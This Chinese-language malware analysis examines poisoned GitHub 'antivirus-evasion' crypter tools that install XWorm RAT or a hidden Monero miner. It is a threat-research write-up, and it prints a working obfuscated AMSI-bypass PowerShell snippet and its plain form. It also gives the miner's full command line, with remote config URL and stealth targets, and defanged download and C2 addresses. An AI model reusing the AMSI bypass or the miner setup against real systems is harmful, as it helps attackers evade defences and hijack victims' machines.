3 [通用GITHUB投毒免杀工具安装木马攻击活动的详细分析]

前言概述

通过github投毒的攻击事件之前发生过不少,笔者此前也分析过好几例,有些网友也给笔者发过一些相关的攻击样本,大家从网上下载的安全工具或免杀工具一定不要随便在自己机器上运行,很有可能这些工具就自带后门木马,偷偷摸摸就给你安装了一个后门在你电脑上监控你。
近日笔者发现了一个免杀工具被修改,然后利用github上投毒,原版的免杀工具是开源的,如下所示:
 


攻击者在2024年5月7日,加入github项目,然后上传带有后门的工具,如下所示:
 


攻击者一共上传了三个相关的工具,如下所示:
 


最新上传的工具,如下所示:
 


笔者对这个github上的几个工具攻击样本进行了详细分析,供大家参考学习。

详细分析

Origami-Crypter-Packer-Bypassing-WD与FUD-Crypter-Windows-Defender样本分析

1.样本下载解压缩之后,包含两个文件,如下所示:
 


2.Origami.exe程序在入口点代码处添加了恶意代码,会从网上下载执行恶意脚本,如下所示:
 


3.Runtime.dll程序在入口点代码处添加了恶意代码,会从网上下载执行恶意脚本,如下所示:
 


4.上面两个程序连接远程URL链接tinyurl[.]com/win-nt 下载的恶意脚本,如下所示:
 


5.恶意脚本会在%temp%上生成一个恶意模块文件DriverDiagnosis.dll,并设置为系统隐藏属性,然后通过REGSVR32程序调用该恶意模块,如下所示:
 


6.恶意模块从远程服务器下载执行恶意脚本,如下所示:
 


7.从URL链接下载的恶意脚本,如下所示:
 


8.恶意脚本会先Patch AMSI AmsiScanBuffer函数,执行AMSI-Bypass操作,如下所示:
 


9.然后执行PayLoad代码,如下所示:
 


10.PayLoad代码解码之后是一个NET程序,编译时间为2024年5月15日,如下所示:
 


11.该NET程序代码被混淆处理了,虽然程序被混淆了,但看这个程序的代码结构,笔者大概率已经猜到是哪个家族的RAT了(疑似XWorm RAT),如下所示:
 


12.动态调试分析,果然是XWorm RAT远控木马,与之前笔者分享过的一篇文章中的Xwormmm基本一致,这次攻击者使用的版本是XWorm V5.2版本,此前笔者分析的是V5.6版本,如下所示:
 


13.该RAT的C2采用pastebin.com存储,如下所示:
 


14.通过pastebin.com链接获取到C2为localbeheaders.mcgo.io[:]4411, 如下所示:
 


笔者此前文章链接:https://xz.aliyun.com/t/14473, 到此这个工具就分析完毕了,攻击者利用这个工具给受害者安装Xworm RAT远控木马。

Scantime-Crypter-Updated---WD-Bypass样本分析

1.样本下载解压缩之后,包含两个文件,如下所示:
 


2.scantime crypter.exe程序是一个NET程序,编译时间为2024年5月9日,如下所示:
 


3.样本运行之后,如下所示:
 


4.攻击者在加密按钮事件中加入了恶意代码,当受害者单击Crypt it按钮的时候,会从远程服务器上下载恶意脚本,如下所示:
 


5.从URL链接hxxps://t[.]ly/B0L6y, 这是一个短链接转化为长链接之后,下载的恶意脚本,如下所示:
 


6.下载的恶意脚本,会在临时目录下生成一个恶意模块OneDriveFileSync.dll,并设置为系统隐藏属性,如下所示:
 


7.设置为系统自启动项,通过自启动项加载恶意模块,如下所示:
 


8.恶意模块的编译时间为2024年5月9日,如下所示:
 


9.恶意模块从远程服务器下载执行恶意脚本,如下所示:
 


10.从URL链接hxxps://t[.]ly/mPrxP, 这是一个短链接转化为长链接之后,下载的恶意脚本,如下所示:
 


11.恶意脚本先执行命令关闭amsi,如下所示:
 


执行的相关命令行为:
$eaofhewfoawe = "System.Type"
$ee = 'amsiInitFailed'
$eoiwfhefawoiefw = [String].Assembly.GetType('System.Reflection.BindingFlags')
$JABJAJBJABJJBJABJAJBJABJAB = $null
[Delegate]::CreateDelegate(("Func``3[String, $(([String].Assembly.GetType('System.Reflection.BindingFlags')).FullName), System.Reflection.FieldInfo]" -as [String].Assembly.GetType($eaofhewfoawe)), Object),('GetField')).Invoke($ee,(('NonPublic,Static') -as $eoiwfhefawoiefw)).SetValue($JABJAJBJABJJBJABJAJBJABJAB,$True)
转化之后:
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPubilc,Static').SetValue($null,$true)
12.恶意脚本再执行ShellCode代码,如下所示:
 


13.ShellCode代码,如下所示:
 


14.动态调试ShellCode代码,如下所示:
 


15.通过VirtualAlloc分配内存空间,如下所示:
 


16.将加密的数据拷贝到分配的内存空间,如下所示:
 


17.拷贝完成之后,如下所示:
 


18.解密出解密密钥,如下所示:
 


19.通过上面的密钥解密ShellCode数据,如下所示:
 


20.解密之后,如下所示:
 


21.解密出来的ShellCode代码执行过程,与此前笔者分析的那篇文章中的ShellCode代码执行过程基本一致,会执行Patch绕过Amsi和WLDP机制等操作,可以去参考笔者上面提到的那篇文章链接,最后在内存中加载解密出来的PayLoad模块,如下所示:
 


22.解密出来的PayLoad模块编译时间为2024年5月4日,入口点代码,如下所示:
 


23.PayLoad调用powercfg.exe程序,设置系统电源,如下所示:
 


24.然后启动svchost进程,然后将恶意代码注入到该进程当中,如下所示:
 


25.注入的恶意代码,使用UPX加壳,如下所示:
 


26.注入的恶意代码为一个挖矿程序,如下所示:
 


27.恶意PayLoad会释放挖矿的WinRing0驱动程序,如下所示:
 


28.该驱动的PDB信息,如下所示:
 


29.从远程服务器上获取挖矿程序的配置信息,如下所示:
 


该挖矿木马的,矿池地址:randomxmonero.auto.nicehash.com,钱包地址:36u5w8pHbiKPB18NAz8GEgjx9kXBUxs5YC.{RANDOM}
该挖矿木马执行命令行,相关参数内容,如下所示:
svchost.exe --algo=rx/0 --url=us.mining.prohashing.com:3359 --user="haddaame" --pass="x" --cpu-max-threads-hint=40 --cinit-winring="wujyovynvvlj.sys" --cinit-remote-config="http://webpanel[.]elementfx.com/remote/prohashingv1.json" --cinit-stealth-targets="Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe" --cinit-api="http://webpanel[.]elementfx.com/api/endpoint.php" --cinit-version="3.4.0" --cinit-id="fothtlmlfehptdpz
到此该工具也分析完成了,通过结合上面的分析,可以得出结论,攻击者利用github投毒修改后的免杀工具,在免杀工具的入口点代码中添加恶意代码,给受害者安装木马,此前给受害者安装挖矿木马,现在又开始给攻击者安装XWorm RAT远控木马。

威胁情报

总结结尾

黑客组织利用各种恶意软件进行的各种攻击活动已经无处不在,防不胜防,很多系统可能已经被感染了各种恶意软件,全球各地每天都在发生各种恶意软件攻击活动,黑客组织一直在持续更新自己的攻击样本以及攻击技术,不断有企业被攻击,这些黑客组织从来没有停止过攻击活动,而且非常活跃,新的恶意软件层出不穷,旧的恶意软件又不断更新,需要时刻警惕,可能一不小心就被安装了某个恶意软件。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/11502.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

沙皮狗为什么禁养?

各位铲屎官们,今天咱们来聊聊一个比较敏感的话题:沙皮狗为什么会被禁养?很多人对沙皮狗情有独钟,但有些地方却明确禁止饲养这种犬种,这背后到底是什么原因呢?别急,今天就来给大家好好揭秘&#…

LeetCode 404.左叶子之和

题目描述 给定二叉树的根节点 root ,返回所有左叶子之和。 示例 1: 输入: root [3,9,20,null,null,15,7] 输出: 24 解释: 在这个二叉树中,有两个左叶子,分别是 9 和 15,所以返回 24 示例 2: 输入: root [1] 输…

一种非接触式智能垃圾桶设计(论文+源码+实物)

1系统方案设计 通过对需求展开分析,本设计非接触式智能垃圾桶采用STM32F103单片机作为控制器,通过红外传感器实现垃圾桶的满溢检测,通过三个SG90舵机分别控制可回收、不可回收、其他垃圾桶盖的开关,并通过WiFi通信模块将数据信息传…

vue入门到实战 三

目录 3.1 v-bind 3.1.1 v-bind指令用法 ​编辑3.1.2 使用v-bind绑定class 3.1.3 使用v-bind绑定style 3.2.1 v-if指令 3.2.1 v-if指令 3.2.2 v-show指令 ​3.3 列表渲染指令v-for 3.3.1 基本用法 3.3.2 数组更新 3.3.3 过滤与排序 3.4 事件处理 3.4.1 使用v-on指令…

Maven全解析:从基础到精通的实战指南

概念: Maven 是跨平台的项目管理工具。主要服务基于 Java 平台的构建,依赖管理和项目信息管理项目构建:高度自动化,跨平台,可重用的组件,标准化的流程 依赖管理: 对第三方依赖包的管理&#xf…

【背包问题】二维费用的背包问题

目录 二维费用的背包问题详解 总结: 空间优化: 1. 状态定义 2. 状态转移方程 3. 初始化 4. 遍历顺序 5. 时间复杂度 例题 1,一和零 2,盈利计划 二维费用的背包问题详解 前面讲到的01背包中,对物品的限定条件…

数据库 - Sqlserver - SQLEXPRESS、由Windows认证改为SQL Server Express认证进行连接 (sa登录)

本文讲SqlServer Express版本在登录的时候, 如何由Windows认证,修改为Sql Server Express认证。 目录 1,SqlServer Express的Windows认证 2,修改为混合认证 3,启用sa 用户 4,用sa 用户登录 下面是详细…

GWO优化LSBooST回归预测matlab

灰狼优化算法(Grey Wolf Optimizer,简称 GWO),是一种群智能优化算法,由澳大利亚格里菲斯大学的 Mirjalii 等人于 2014 年提出。该算法的设计灵感源自灰狼群体的捕食行为,核心思想是模仿灰狼社会的结构与行为…

C++模板编程——可变参函数模板

目录 1. 可变参函数模板基本介绍 2. 参数包展开——通过递归函数 3. 参数包展开——通过编译期间if语句(constexpr if) 4. 重载 5. 后记 进来看的小伙伴们应该对C中的模板有了一定了解,下面给大家介绍一下可变参函数模板。过于基础的概念将不仔细介绍。 1. 可变…

海外问卷调查之渠道查,企业经营的指南针

海外问卷调查,是企业调研最常用到的方法,有目的、有计划、有系统地收集研究对象的现实状况或历史状况的一种有效手段,是指导企业经营的有效手段。 海外问卷调查充分运用历史法、观察法等方法,同时使用谈话、问卷、个案研究、测试…

【Numpy核心编程攻略:Python数据处理、分析详解与科学计算】2.3 结构化索引:记录数组与字段访问

2.3 结构化索引:记录数组与字段访问 目录/提纲 #mermaid-svg-gEcf7BuFng5Yj4mv {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-gEcf7BuFng5Yj4mv .error-icon{fill:#552222;}#mermaid-svg-gEcf7BuFng5Y…

在GPIO控制器中,配置通用输入,读取IO口电平时,上拉和下拉起到什么作用

上下拉电阻作用 在通用输入的时候,也就是在读某个IO的电平的时候 一定要让IO口先保持一个电平状态,这样才能检测到不同电平状态。 如何保持电平状态? 1. 可以通过芯片内部的上下拉电阻,由于是弱上下拉一般不用 2. 硬件外界一个…

Unity学习笔记

1.创建基础物体 层级面板右键 2.创建C#脚本 点击资源浏览器 - 右键 脚本组件需要挂在到一个物体上才能运行 点击立方体 - 添加组件 点击运行 3.安装Shader Graph

【python】python油田数据分析与可视化(源码+数据集)【独一无二】

👉博__主👈:米码收割机 👉技__能👈:C/Python语言 👉专__注👈:专注主流机器人、人工智能等相关领域的开发、测试技术。 【python】python油田数据分析与可视化&#xff08…

129.求根节点到叶节点数字之和(遍历思想)

Problem: 129.求根节点到叶节点数字之和 文章目录 题目描述思路复杂度Code 题目描述 思路 遍历思想(利用二叉树的先序遍历) 直接利用二叉树的先序遍历,将遍历过程中的节点值先利用字符串拼接起来遇到根节点时再转为数字并累加起来,在归的过程中&#xf…

SpringCloud篇 微服务架构

1. 工程架构介绍 1.1 两种工程架构模型的特征 1.1.1 单体架构 上面这张图展示了单体架构(Monolithic Architecture)的基本组成和工作原理。单体架构是一种传统的软件架构模式,其中所有的功能都被打包在一个单一的、紧密耦合的应用程序中。 …

一、TensorFlow的建模流程

1. 数据准备与预处理: 加载数据:使用内置数据集或自定义数据。 预处理:归一化、调整维度、数据增强。 划分数据集:训练集、验证集、测试集。 转换为Dataset对象:利用tf.data优化数据流水线。 import tensorflow a…

鸟哥Linux私房菜笔记(三)

鸟哥Linux私房菜笔记(三) 该第三部分和第四部分主要为原书的第十一章(正则表达式与文件格式化处理),第十二章学习shell脚本,第十六章(进程管理与SElinux初探部分),第十七…

基于springboot+vue的哈利波特书影音互动科普网站

开发语言:Java框架:springbootJDK版本:JDK1.8服务器:tomcat7数据库:mysql 5.7(一定要5.7版本)数据库工具:Navicat11开发软件:eclipse/myeclipse/ideaMaven包:…

【Numpy核心编程攻略:Python数据处理、分析详解与科学计算】2.12 连续数组:为什么contiguous这么重要?

2.12 连续数组:为什么contiguous这么重要? 目录 #mermaid-svg-wxhozKbHdFIldAkj {font-family:"trebuchet ms",verdana,arial,sans-serif;font-size:16px;fill:#333;}#mermaid-svg-wxhozKbHdFIldAkj .error-icon{fill:#552222;}#mermaid-svg-…